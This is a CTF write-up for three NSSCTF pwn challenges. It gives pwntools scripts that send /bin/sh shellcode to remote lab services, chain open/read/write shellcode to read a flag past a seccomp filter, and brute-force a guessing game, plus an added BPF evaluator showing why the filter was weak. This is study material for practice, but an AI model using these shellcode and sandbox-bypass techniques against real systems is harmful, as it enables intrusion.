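NSSCTF Round#9 Basic: partial write-up

3/4 solved; one of them fell to a brute-force script that got lucky, and the last challenge was Rust reversing...
myexec
mmap allocates a writable region, and the read function writes the input into that region.
Sending shellcraft.sh() directly as the shellcode is enough.
Exploit: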

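from pwn import *
context(log_level='debug',os='linux',arch='amd64')

# io=process("./service")
io=remote("43.143.7.127",28003)

# Assemble the stock /bin/sh shellcode for amd64
shellcode=asm(shellcraft.sh())
# Wait for the prompt line, then send the shellcode that read() stores in the mmap'd region
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()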




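mymem
The function body is the same as in the previous challenge, but seccomp-tools dump shows that this one restricts syscall numbers (sys_number).
The restriction can be bypassed by chaining open("") + read("") + write() calls instead.
Exploit: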

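from pwn import *
context(log_level='debug',os='linux',arch='amd64')

# io=process("./mymem")
io=remote("43.143.7.127",28391)
# Address used as the buffer for read() and write()
tp_addr=0x50000

# open the flag file, read 50 bytes from fd 3 (assumed to be the fd open() returns) into tp_addr, then write them to stdout
shellcode=asm(shellcraft.open("/home/ctf/flag.txt"))+asm(shellcraft.read(3,tp_addr,50))+asm(shellcraft.write(1,tp_addr,50))
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()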
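
An added example (not from the original write-up, and not the challenge's real filter): a small classic-BPF evaluator run over two constructed seccomp programs. It shows why a filter that only denies execve/execveat still leaves the open + read + write path described above, while an allowlist without open/openat closes it. The filter contents, the SYSCALLS table and the function names are assumptions.

```python
import struct

AUDIT_ARCH_X86_64 = 0xC000003E
SECCOMP_RET_ALLOW, SECCOMP_RET_KILL = 0x7FFF0000, 0x00000000
# x86-64 syscall numbers relevant to this write-up
SYSCALLS = {"read": 0, "write": 1, "open": 2, "execve": 59, "openat": 257, "execveat": 322}

# Constructed denylist (assumed shape, not the challenge's filter):
# kill execve/execveat, allow everything else. Tuples are (code, jt, jf, k).
DENYLIST = [
    (0x20, 0, 0, 4),                  # A = seccomp_data.arch
    (0x15, 0, 4, AUDIT_ARCH_X86_64),  # wrong arch -> kill
    (0x20, 0, 0, 0),                  # A = seccomp_data.nr
    (0x15, 2, 0, 59),                 # execve -> kill
    (0x15, 1, 0, 322),                # execveat -> kill
    (0x06, 0, 0, SECCOMP_RET_ALLOW),
    (0x06, 0, 0, SECCOMP_RET_KILL),
]
# Constructed allowlist: read, write, exit, exit_group only; no open/openat.
ALLOWLIST = [
    (0x20, 0, 0, 4), (0x15, 0, 6, AUDIT_ARCH_X86_64), (0x20, 0, 0, 0),
    (0x15, 3, 0, 0), (0x15, 2, 0, 1), (0x15, 1, 0, 60), (0x15, 0, 1, 231),
    (0x06, 0, 0, SECCOMP_RET_ALLOW), (0x06, 0, 0, SECCOMP_RET_KILL),
]

def run_filter(prog, nr, arch=AUDIT_ARCH_X86_64):
    """Evaluate a classic-BPF seccomp program and return its action."""
    data = struct.pack("<iIQ6Q", nr, arch, 0, *([0] * 6))  # struct seccomp_data
    acc, pc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        pc += 1
        if code == 0x20:      # BPF_LD | BPF_W | BPF_ABS
            acc = struct.unpack_from("<I", data, k)[0]
        elif code == 0x15:    # BPF_JMP | BPF_JEQ | BPF_K
            pc += jt if acc == k else jf
        elif code == 0x06:    # BPF_RET | BPF_K
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")
    raise ValueError("filter ended without a return")

def allowed(prog):
    return sorted(n for n, nr in SYSCALLS.items()
                  if run_filter(prog, nr) == SECCOMP_RET_ALLOW)

def file_read_possible(prog):
    ok = set(allowed(prog))
    return bool(ok & {"open", "openat"}) and {"read", "write"} <= ok
```
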




oldfashion
Solved in an unintended way.

from pwn import *
context(log_level='debug',os='linux',arch='amd64')


# io=process("./zzzzz")
io=remote("43.142.108.3",28524)
# Keep sending the same guess until the service prints the success message
while 1:
    io.sendline(b"2")
    if io.recv()==(b"Congratulations! You guessed the number correctly.\n"):
        break

io.interactive()